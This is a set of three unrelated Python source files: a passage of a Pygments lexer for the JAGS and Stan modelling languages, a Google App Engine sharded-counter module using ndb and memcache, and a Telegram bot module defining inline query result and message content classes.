'loggam', 'logit', 'phi', 'pow', 'probit', 'round', 'sin', 'sinh',
'sqrt', 'step', 'tan', 'tanh', 'trunc', 'inprod', 'interp.lin',
'logdet', 'max', 'mean', 'min', 'prod', 'sum', 'sd', 'inverse',
'rank', 'sort', 't', 'acos', 'acosh', 'asin', 'asinh', 'atan',
# Truncation/censoring
'T', 'I')
# Distributions with density, probability and quantile functions; each
# stem below is expanded to its d/p/q variants (e.g. dnorm/pnorm/qnorm)
_DISTRIBUTIONS = tuple('[dpq]%s' % x for x in
                       ('bern', 'beta', 'chisqr', 'dexp', 'exp', 'f',
                        'gamma', 'gen.gamma', 'logis', 'lnorm', 'negbin',
                        'nchisqr', 'norm', 'par', 'pois', 'weib'))
# Other distributions without density and probability
_OTHER_DISTRIBUTIONS = (
'dt', 'dunif', 'dbetabin', 'dbern', 'dbin', 'dcat', 'dhyper',
'ddirch', 'dmnorm', 'dwish', 'dmt', 'dmulti', 'dbinom', 'dchisq',
'dnbinom', 'dweibull', 'ddirich')
tokens = {
'whitespace': [
(r"\s+", Text),
],
'names': [
# Regular variable names
(r'[a-zA-Z][\w.]*\b', Name),
],
'comments': [
# do not use stateful comments
(r'(?s)/\*.*?\*/', Comment.Multiline),
# Comments
(r'#.*$', Comment.Single),
],
'root': [
# Comments
include('comments'),
include('whitespace'),
# Block start
(r'(model|data)(\s+)(\{)',
bygroups(Keyword.Namespace, Text, Punctuation)),
(r'var(?![\w.])', Keyword.Declaration),
# Reserved Words
(r'(for|in)(?![\w.])', Keyword.Reserved),
# Builtins
# Need a lookahead because '.' is a valid name character
(r'(%s)(?=\s*\()' % r'|'.join(_FUNCTIONS
+ _DISTRIBUTIONS
+ _OTHER_DISTRIBUTIONS),
Name.Builtin),
# Names
include('names'),
# Number Literals
(r'[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?', Number),
(r'\[|\]|\(|\)|:|,|;', Punctuation),
# Assignment operators
(r'<-|~', Operator),
# JAGS includes many more operators than OpenBUGS
(r'\+|-|\*|/|\|\||&&|[<>=]=?|\^|%.*?%', Operator),
(r'[{}]', Punctuation),
]
}
def analyse_text(text):
if re.search(r'^\s*model\s*\{', text, re.M):
if re.search(r'^\s*data\s*\{', text, re.M):
return 0.9
elif re.search(r'^\s*var', text, re.M):
return 0.9
else:
return 0.3
else:
return 0
class StanLexer(RegexLexer):
"""Pygments Lexer for Stan models.
The Stan modeling language is specified in the *Stan Modeling Language
User's Guide and Reference Manual, v2.4.0*,
`pdf <https://github.com/stan-dev/stan/releases/download/v2.4.0/stan-reference-2.4.0.pdf>`__.
.. versionadded:: 1.6
"""
name = 'Stan'
aliases = ['stan']
filenames = ['*.stan']
tokens = {
'whitespace': [
(r"\s+", Text),
],
'comments': [
(r'(?s)/\*.*?\*/', Comment.Multiline),
# Comments
(r'(//|#).*$', Comment.Single),
],
'root': [
# Stan is more restrictive on strings than this regex
(r'"[^"]*"', String),
# Comments
include('comments'),
include('whitespace'),
# Block start
(r'(%s)(\s*)(\{)' %
r'|'.join(('functions', 'data', r'transformed\s+data',
'parameters', r'transformed\s+parameters',
'model', r'generated\s+quantities')),
bygroups(Keyword.Namespace, Text, Punctuation)),
# Reserved Words
(r'(%s)\b' % r'|'.join(_stan_builtins.KEYWORDS), Keyword),
# Truncation
(r'T(?=\s*\[)', Keyword),
# Data types
(r'(%s)\b' % r'|'.join(_stan_builtins.TYPES), Keyword.Type),
# Punctuation
(r"[;:,\[\]()]", Punctuation),
# Builtin
(r'(%s)(?=\s*\()'
% r'|'.join(_stan_builtins.FUNCTIONS
+ _stan_builtins.DISTRIBUTIONS),
Name.Builtin),
# Special names ending in __, like lp__
(r'[A-Za-z]\w*__\b', Name.Builtin.Pseudo),
(r'(%s)\b' % r'|'.join(_stan_builtins.RESERVED), Keyword.Reserved),
# Regular variable names
(r'[A-Za-z]\w*\b', Name),
# Real Literals
(r'-?[0-9]+(\.[0-9]+)?[eE]-?[0-9]+', Number.Float),
(r'-?([0-9]+\.[0-9]*|\.[0-9]+)', Number.Float),
# Integer Literals
(r'-?[0-9]+', Number.Integer),
# Assignment operators
# SLexer makes these tokens Operators.
(r'<-|~', Operator),
# Infix, prefix and postfix operators (and = )
(r"\+|-|\.?\*|\.?/|\\|'|\^|==?|!=?|<=?|>=?|\|\||&&", Operator),
# Block delimiters
(r'[{}]', Punctuation),
]
}
def analyse_text(text):
if re.search(r'^\s*parameters\s*\{', text, re.M):
return 1.0
else:
return 0.0
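if __name__ == '__main__':
    # Smoke-test sketch (not part of the original module): tokenize a tiny
    # Stan program and print the non-whitespace (token type, value) pairs.
    # `get_tokens` is the standard Lexer API that RegexLexer inherits.
    demo = 'parameters { real mu; } model { mu ~ normal(0, 1); }'
    for token_type, value in StanLexer().get_tokens(demo):
        if value.strip():
            print('%s %r' % (token_type, value))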
|
|
"""
Copyright 2013 The Trustees of Princeton University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# borrowed from https://developers.google.com/appengine/articles/sharding_counters
import random
from google.appengine.api import memcache
from google.appengine.ext import ndb
import backends as backend
SHARD_KEY_TEMPLATE = 'shardcounter-{}-{:d}'
def _all_keys(name, num_shards):
"""Returns all possible keys for the counter name given the config.
Args:
name: The name of the counter.
num_shards: The number of shards for this counter.
Returns:
The full list of ndb.Key values corresponding to all the possible
counter shards that could exist.
"""
shard_key_strings = [SHARD_KEY_TEMPLATE.format(name, index) for index in range(num_shards)]
return [ndb.Key(GeneralCounterShard, shard_key_string) for shard_key_string in shard_key_strings]
class GeneralCounterShard(ndb.Model):
"""Shards for each named counter."""
count = ndb.IntegerProperty(default=0)
@ndb.tasklet
def _get_count_async(name, key_gen, use_memcache=True):
"""Retrieve the value for a given sharded counter.
Args:
name: The name of the counter.
key_gen: Zero-argument callable that returns the list of shard keys.
use_memcache: Whether to read and populate the cached total.
Returns:
Integer; the cumulative count of all sharded counters for the given
counter name.
"""
# only cache if it exists at all
do_cache = False
total = None
if use_memcache:
total = memcache.get(name)
if total is None:
total = 0
all_keys = key_gen()
counters = yield ndb.get_multi_async( all_keys, use_cache=False, use_memcache=False )
for counter in counters:
if counter is not None:
total += counter.count
do_cache = True
if do_cache and use_memcache:
memcache.set(name, total)
raise ndb.Return( total )
def get_count(name, num_shards, use_memcache=True):
"""Synchronously retrieve the total for the named sharded counter."""
count_fut = _get_count_async(name, lambda: _all_keys(name, num_shards), use_memcache=use_memcache)
return count_fut.get_result()
def get_count_async(name, num_shards, use_memcache=True):
"""Asynchronously retrieve the total; returns an ndb Future."""
return _get_count_async(name, lambda: _all_keys(name, num_shards), use_memcache=use_memcache)
def count_from_futures( name, futs, do_cache=True ):
"""
Get the value of a counter from a list of futures returned from get_count_async
"""
count = 0
for f in futs:
count += f.get_result()
if do_cache:
memcache.set(name, count)
return count
def flush_cache(name):
"""
Flush the cache for this counter
"""
memcache.delete(name)
def increment(name, num_shards, delta=1, do_transaction=True, use_memcache=True):
"""
Increment the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
delta: the amount to add (defaults to 1)
"""
return _change(name, num_shards, delta, do_transaction=do_transaction, use_memcache=use_memcache)
def decrement(name, num_shards, delta=-1, do_transaction=True, use_memcache=True ):
"""
Decrement the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
delta: the signed amount to add (defaults to -1)
"""
return _change(name, num_shards, delta, do_transaction=do_transaction, use_memcache=use_memcache)
def delete(name, num_shards):
"""
Delete the named counter and all of its shards.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
"""
all_keys = _all_keys(name, num_shards)
ndb.delete_multi( all_keys )
memcache.delete( name )
return
def create(name, do_transaction=False ):
"""
create a named counter
"""
return _change(name, 1, 0, do_transaction=do_transaction )
def increment_async(name, num_shards, delta=1, do_transaction=True, use_memcache=True):
"""
Asynchronously increment the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
Return:
A future for the transaction
"""
return _change_async(name, num_shards, delta, do_transaction=do_transaction, use_memcache=use_memcache)
def decrement_async(name, num_shards, delta=-1, do_transaction=True, use_memcache=True):
"""
Asynchronously decrement the value for a given sharded counter.
This will create the counter if it does not exist.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
"""
return _change_async(name, num_shards, delta, do_transaction=do_transaction, use_memcache=use_memcache)
def delete_async(name, num_shards):
"""
Asynchronously delete the named counter and all of its shards.
Args:
name: The name of the counter.
num_shards: the number of shards in the counter
Return:
A list of Futures for each entity making up the counter.
"""
all_keys = _all_keys(name, num_shards)
delete_futs = ndb.delete_multi_async( all_keys )
memcache.delete( name )
return delete_futs
def create_async(name, do_transaction=False ):
"""
Create a named counter (a single shard initialized to zero), asynchronously.
"""
return _change_async(name, 1, 0, do_transaction=do_transaction )
def _change_async(name, num_shards, value, do_transaction=True, use_memcache=True):
"""
Asynchronously apply a signed change to a sharded counter, picking one
shard at random to absorb the write.
Args:
name: The name of the counter.
num_shards: How many shards to use.
value: The signed amount to add to the chosen shard.
do_transaction: Whether to run the update inside an ndb transaction.
use_memcache: Whether to mirror the change into memcache.
"""
@ndb.tasklet
def txn():
index = random.randint(0, num_shards - 1)
shard_key_string = SHARD_KEY_TEMPLATE.format(name, index)
counter = yield GeneralCounterShard.get_by_id_async(shard_key_string)
if counter is None:
counter = GeneralCounterShard(id=shard_key_string)
counter.count += value
yield counter.put_async()
if use_memcache:
if value > 0:
memcache.incr( name, delta=value )
elif value < 0:
memcache.decr( name, delta=-value )
else:
memcache.delete( name )
raise ndb.Return( True )
if do_transaction:
return ndb.transaction_async( txn )
else:
return txn()
def _change(name, num_shards, value, do_transaction=True, use_memcache=True ):
"""
Synchronous wrapper around _change_async
"""
tf = _change_async(name, num_shards, value, do_transaction=do_transaction, use_memcache=use_memcache)
tf.wait()
return tf.get_result()
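# Usage sketch (assumes a running App Engine environment providing the ndb
# and memcache services; this module cannot run standalone, so the example
# is left as a comment). All names below are defined in this module:
#
#   NUM_SHARDS = 20
#   create('page-views')
#   increment('page-views', NUM_SHARDS)             # +1 on a random shard
#   increment('page-views', NUM_SHARDS, delta=5)    # larger step
#   total = get_count('page-views', NUM_SHARDS)     # memcache-backed read
#   decrement('page-views', NUM_SHARDS)
#   flush_cache('page-views')                       # force a fresh ndb read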
|
|
"""inline module.
This module describes the Inline content to answer inlineQuery.
"""
from uuid import uuid4
from .content import DictItem
class _InlineQueryResult(DictItem):
"""Base class."""
_result_type = None
_prefix = None
def __init__(self, result_id=None, url=None, title=None, width=None,
height=None, thumb_url=None, thumb_width=None, caption=None,
thumb_height=None, file_id=None, description=None,
duration=None, mime_type=None, reply_markup=None,
input_message_content=None):
"""Initial instance.
:param result_id: Unique identifier for this result, 1-64 bytes.
:param url: URL of the result.
:param title: Title of the result.
:param width: Width of the result (photo, video, etc.).
:param height: Height of the result (photo, video, etc.).
:param thumb_url: URL of the thumbnail for the result.
:param thumb_width: Thumbnail width.
:param thumb_height: Thumbnail height.
:param caption: Caption of the result to be sent, 0-200 characters.
:param file_id: A valid file identifier of result cached.
:param description: Short description of the result.
:param duration: Duration in seconds.
:param mime_type: Mime type of the content.
:param reply_markup: Inline keyboard attached to the message.
:param input_message_content: Content of the message to be sent.
"""
self.id = result_id or uuid4().hex
self.title = title
self.thumb_url = thumb_url
self.thumb_width = thumb_width
self.thumb_height = thumb_height
self.description = description
self.caption = caption
self.mime_type = mime_type
self.reply_markup = reply_markup
self.input_message_content = input_message_content
self._prefix = self._prefix or self._result_type
# Store the type-specific attributes under prefixed names, e.g. a 'photo'
# result gets photo_url/photo_width/photo_height and a 'voice' result
# gets voice_url/voice_duration.
for attr, value in zip(
('url', 'width', 'height', 'duration', 'file_id'),
(url, width, height, duration, file_id)
):
setattr(self, '%s_%s' % (self._prefix, attr), value)
def __str__(self):
return '{}(id:{})'.format(self.__class__.__name__, self.id)
@property
def result_type(self):
return self._result_type
def to_dict(self):
"""Represent the object as a dictionary."""
# Convert the nested content once; the isinstance guard keeps repeated
# to_dict() calls from failing on an already-converted dict.
if self.input_message_content and not isinstance(self.input_message_content, dict):
self.input_message_content = self.input_message_content.to_dict()
obj_dict = super(_InlineQueryResult, self).to_dict()
obj_dict['type'] = self._result_type
return obj_dict
class _InlineQueryResultImage(_InlineQueryResult):
"""Base constructor for image classes."""
def __init__(self, url, thumb_url, **kwargs):
super(_InlineQueryResultImage, self).__init__(
url=url, thumb_url=thumb_url, **kwargs
)
class _InlineQueryResultAudio(_InlineQueryResult):
"""Base constructor for audio classes."""
def __init__(self, url, title, **kwargs):
super(_InlineQueryResultAudio, self).__init__(
url=url, title=title, **kwargs
)
class _InlineQueryResultCached(_InlineQueryResult):
"""Base constructor for cached classes."""
def __init__(self, file_id, **kwargs):
super(_InlineQueryResultCached, self).__init__(
file_id=file_id, **kwargs
)
class _InlineQueryResultCachedTitle(_InlineQueryResult):
"""Base constructor for cached classes."""
def __init__(self, file_id, title, **kwargs):
super(_InlineQueryResultCachedTitle, self).__init__(
file_id=file_id, title=title, **kwargs
)
class InlineQueryResultPhoto(_InlineQueryResultImage):
"""Represents a link to a photo. By default, this photo will be sent by the
user with optional caption. Alternatively, you can use
input_message_content to send a message with the specified content instead
of the photo.
"""
_result_type = 'photo'
class InlineQueryResultGif(_InlineQueryResultImage):
"""Represents a link to an animated GIF file. By default, this animated GIF
file will be sent by the user with optional caption. Alternatively, you can
use input_message_content to send a message with the specified content
instead of the animation.
:param gif_duration: Duration of the GIF.
:param kwargs: Keyword arguments for _InlineQueryResultImage.
"""
_result_type = 'gif'
def __init__(self, gif_duration=None, **kwargs):
super(InlineQueryResultGif, self).__init__(**kwargs)
self.gif_duration = gif_duration
class InlineQueryResultMpeg4Gif(_InlineQueryResultImage):
"""Represents a link to a video animation (H.264/MPEG-4 AVC video without
sound). By default, this animated MPEG-4 file will be sent by the user with
optional caption. Alternatively, you can use input_message_content to send
a message with the specified content instead of the animation.
:param mpeg4_duration: Video duration.
:param kwargs: Keyword arguments for _InlineQueryResultImage.
"""
_result_type = 'mpeg4_gif'
_prefix = 'mpeg4'
def __init__(self, mpeg4_duration=None, **kwargs):
super(InlineQueryResultMpeg4Gif, self).__init__(**kwargs)
self.mpeg4_duration = mpeg4_duration
class InlineQueryResultAudio(_InlineQueryResultAudio):
"""Represents a link to an mp3 audio file. By default, this audio file will
be sent by the user. Alternatively, you can use input_message_content to
send a message with the specified content instead of the audio.
"""
_result_type = 'audio'
class InlineQueryResultVoice(_InlineQueryResultAudio):
"""Represents a link to a voice recording in an .ogg container encoded with
OPUS. By default, this voice recording will be sent by the user.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the voice message.
"""
_result_type = 'voice'
class InlineQueryResultArticle(_InlineQueryResult):
"""Represents a link to an article or web page."""
_result_type = 'article'
def __init__(self, title, input_message_content, hide_url=None, **kwargs):
"""Initial instance.
:param title: Title of the result.
:param input_message_content: Content of the message to be sent (
InputTextMessageContent, InputLocationMessageContent,
InputVenueMessageContent, InputContactMessageContent).
:param kwargs: url, description, thumb_url, thumb_width, thumb_height,
reply_markup.
"""
super(InlineQueryResultArticle, self).__init__(
title=title, input_message_content=input_message_content, **kwargs
)
self.hide_url = hide_url
class InlineQueryResultVideo(_InlineQueryResult):
"""Represents a link to a page containing an embedded video player or a
video file. By default, this video file will be sent by the user with an
optional caption. Alternatively, you can use input_message_content to send
a message with the specified content instead of the video.
"""
_result_type = 'video'
def __init__(self, url, thumb_url, title, mime_type, **kwargs):
"""Initial instance.
:param url: A valid URL for the embedded video player or video file.
:param thumb_url: URL of the thumbnail (jpeg only) for the video.
:param title: Title for the result.
:param mime_type: Mime type of the content of video url, 'text/html' or
'video/mp4'.
:param kwargs: caption, width, height, duration, description,
reply_markup, input_message_content.
"""
super(InlineQueryResultVideo, self).__init__(
url=url,
thumb_url=thumb_url,
title=title,
mime_type=mime_type,
**kwargs
)
class InlineQueryResultDocument(_InlineQueryResult):
"""Represents a link to a file. By default, this file will be sent by the
user with an optional caption. Alternatively, you can use
input_message_content to send a message with the specified content instead
of the file. Currently, only .PDF and .ZIP files can be sent using this
method.
"""
_result_type = 'document'
def __init__(self, url, title, mime_type, **kwargs):
"""Initial instance.
:param url: A valid URL for the file.
:param title: Title for the result.
:param mime_type: Mime type of the content of the file, either
'application/pdf' or 'application/zip'.
:param kwargs: thumb_url, thumb_width, thumb_height, description,
caption, reply_markup, input_message_content.
"""
super(InlineQueryResultDocument, self).__init__(
url=url, title=title, mime_type=mime_type, **kwargs
)
class InlineQueryResultLocation(_InlineQueryResult):
"""Represents a location on a map. By default, the location will be sent by
the user. Alternatively, you can use input_message_content to send a
message with the specified content instead of the location.
"""
_result_type = 'location'
def __init__(self, latitude, longitude, title, **kwargs):
"""Initial instance.
:param latitude: Location latitude in degrees.
:param longitude: Location longitude in degrees.
:param title: Location title.
:param kwargs: thumb_url, thumb_width, thumb_height, reply_markup,
input_message_content.
"""
super(InlineQueryResultLocation, self).__init__(title=title, **kwargs)
self.latitude = latitude
self.longitude = longitude
class InlineQueryResultVenue(InlineQueryResultLocation):
"""Represents a venue. By default, the venue will be sent by the user.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the venue.
"""
_result_type = 'venue'
def __init__(self, latitude, longitude, title, address, **kwargs):
"""Initial instance.
:param latitude: Latitude of the venue location in degrees.
:param longitude: Longitude of the venue location in degrees.
:param title: Title of the venue.
:param address: Address of the venue.
:param kwargs: thumb_url, thumb_width, thumb_height, foursquare_id,
reply_markup, input_message_content.
"""
super(InlineQueryResultVenue, self).__init__(
latitude=latitude, longitude=longitude, title=title, **kwargs
)
self.address = address
class InlineQueryResultContact(_InlineQueryResult):
"""Represents a contact with a phone number. By default, this contact will
be sent by the user. Alternatively, you can use input_message_content to
send a message with the specified content instead of the contact.
"""
_result_type = 'contact'
def __init__(self, phone_number, first_name, last_name=None, **kwargs):
"""Initial instance.
:param phone_number: Contact's phone number.
:param first_name: Contact's first name.
:param last_name: Contact's last name.
:param kwargs: thumb_url, thumb_width, thumb_height, reply_markup,
input_message_content.
"""
super(InlineQueryResultContact, self).__init__(**kwargs)
self.phone_number = phone_number
self.first_name = first_name
self.last_name = last_name
class InlineQueryResultGame(_InlineQueryResult):
"""Represents a Game."""
_result_type = 'game'
def __init__(self, game_short_name, **kwargs):
"""Initial instance.
:param game_short_name: Short name of the game.
:param kwargs: reply_markup.
"""
super(InlineQueryResultGame, self).__init__(**kwargs)
self.game_short_name = game_short_name
class InlineQueryResultCachedPhoto(_InlineQueryResultCached):
"""Represents a link to a photo stored on the Telegram servers. By default,
this photo will be sent by the user with an optional caption.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the photo.
"""
# Use the underlying class attribute: reading the `result_type` property
# on the class itself would yield the property object, not 'photo'.
_result_type = InlineQueryResultPhoto._result_type
class InlineQueryResultCachedGif(_InlineQueryResultCached):
"""Represents a link to an animated GIF file stored on the Telegram
servers. By default, this animated GIF file will be sent by the user with
an optional caption. Alternatively, you can use input_message_content to
send a message with specified content instead of the animation.
"""
_result_type = InlineQueryResultGif._result_type
class InlineQueryResultCachedMpeg4Gif(_InlineQueryResultCached):
"""Represents a link to a video animation (H.264/MPEG-4 AVC video without
sound) stored on the Telegram servers. By default, this animated MPEG-4
file will be sent by the user with an optional caption. Alternatively, you
can use input_message_content to send a message with the specified content
instead of the animation.
"""
_result_type = InlineQueryResultMpeg4Gif._result_type
class InlineQueryResultCachedSticker(_InlineQueryResultCached):
"""Represents a link to a sticker stored on the Telegram servers. By
default, this sticker will be sent by the user. Alternatively, you can use
input_message_content to send a message with the specified content instead
of the sticker.
"""
_result_type = 'sticker'
class InlineQueryResultCachedAudio(_InlineQueryResultCached):
"""Represents a link to an mp3 audio file stored on the Telegram servers.
By default, this audio file will be sent by the user. Alternatively, you
can use input_message_content to send a message with the specified content
instead of the audio.
"""
_result_type = InlineQueryResultAudio._result_type
class InlineQueryResultCachedDocument(_InlineQueryResultCachedTitle):
"""Represents a link to a file stored on the Telegram servers. By default,
this file will be sent by the user with an optional caption. Alternatively,
you can use input_message_content to send a message with the specified
content instead of the file.
"""
_result_type = InlineQueryResultDocument._result_type
class InlineQueryResultCachedVideo(_InlineQueryResultCachedTitle):
"""Represents a link to a video file stored on the Telegram servers. By
default, this video file will be sent by the user with an optional caption.
Alternatively, you can use input_message_content to send a message with the
specified content instead of the video.
"""
_result_type = InlineQueryResultVideo._result_type
class InlineQueryResultCachedVoice(_InlineQueryResultCachedTitle):
"""Represents a link to a voice message stored on the Telegram servers. By
default, this voice message will be sent by the user. Alternatively, you
can use input_message_content to send a message with the specified content
instead of the voice message.
"""
_result_type = InlineQueryResultVoice._result_type
class InputTextMessageContent(DictItem):
"""Represents the content of a text message to be sent as the result of an
inline query.
"""
def __init__(self, message_text, parse_mode=None,
disable_web_page_preview=None):
"""Initial instance.
:param message_text: Text of the message to be sent, 1-4096 characters.
:param parse_mode: Send Markdown or HTML, if you want Telegram apps to
show bold, italic, fixed-width text or inline URLs in your bot's
message.
:param disable_web_page_preview: Disables link previews for links in
the sent message.
"""
self.message_text = message_text
self.parse_mode = parse_mode
self.disable_web_page_preview = disable_web_page_preview
class InputLocationMessageContent(DictItem):
"""Represents the content of a location message to be sent as the result of
an inline query.
"""
def __init__(self, latitude, longitude):
"""Initial instance.
:param latitude: Latitude of the location in degrees.
:param longitude: Longitude of the location in degrees.
"""
self.latitude = latitude
self.longitude = longitude
class InputVenueMessageContent(InputLocationMessageContent):
"""Represents the content of a venue message to be sent as the result of an
inline query.
"""
def __init__(self, latitude, longitude, title, address,
foursquare_id=None):
"""Initial instance.
:param latitude: Latitude of the venue in degrees.
:param longitude: Longitude of the venue in degrees.
:param title: Name of the venue.
:param address: Address of the venue.
:param foursquare_id: Foursquare identifier of the venue, if known.
"""
super(InputVenueMessageContent, self).__init__(latitude, longitude)
self.title = title
self.address = address
self.foursquare_id = foursquare_id
class InputContactMessageContent(DictItem):
"""Represents the content of a contact message to be sent as the result of
an inline query.
"""
def __init__(self, phone_number, first_name, last_name=None):
"""Initial instance.
:param phone_number: Contact's phone number.
:param first_name: Contact's first name.
:param last_name: Contact's last name.
"""
self.phone_number = phone_number
self.first_name = first_name
self.last_name = last_name
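# Usage sketch (a commented example using only classes defined above; the
# module's relative import of DictItem means it cannot run standalone):
#
#   content = InputTextMessageContent('*hello*', parse_mode='Markdown')
#   article = InlineQueryResultArticle(
#       title='Greeting',
#       input_message_content=content,
#       description='Sends a markdown greeting',
#   )
#   payload = article.to_dict()  # includes 'type': 'article' and a uuid id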
|